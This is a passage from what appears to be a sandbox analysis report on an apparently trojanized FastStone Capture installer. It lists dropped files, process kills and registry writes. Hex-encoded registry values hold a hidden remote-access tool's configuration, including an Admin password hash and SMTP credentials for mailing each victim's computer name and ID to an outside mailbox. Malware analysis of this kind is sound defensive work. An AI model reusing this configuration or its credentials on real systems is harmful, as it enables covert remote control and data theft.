| File created | C:\Program Files (x86)\FastStone Capture\FSCapture.LANG | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3536322d3633312d3539302d3830323c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
